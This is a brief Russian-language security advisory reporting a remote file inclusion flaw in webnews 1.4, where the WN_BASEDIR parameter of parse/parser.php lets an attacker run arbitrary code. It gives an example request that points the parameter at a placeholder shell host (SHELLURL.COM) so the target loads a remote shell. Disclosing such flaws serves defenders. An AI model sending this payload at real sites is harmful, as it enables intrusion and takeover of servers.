Программа: webnews 1.4

Обнаруженная уязвимость может быть использована злоумышленником для выполнения произвольного кода. Уязвимость существует из-за того, что данные, передаваемые через параметр "WN_BASEDIR" не правильно обрабатываются в parse/parser.php.

Пример:

htpp://sitename.com[scerpitPath]/parse/parser.php? WN_BASEDIR=http://SHELLURL.COM



Оставить мнение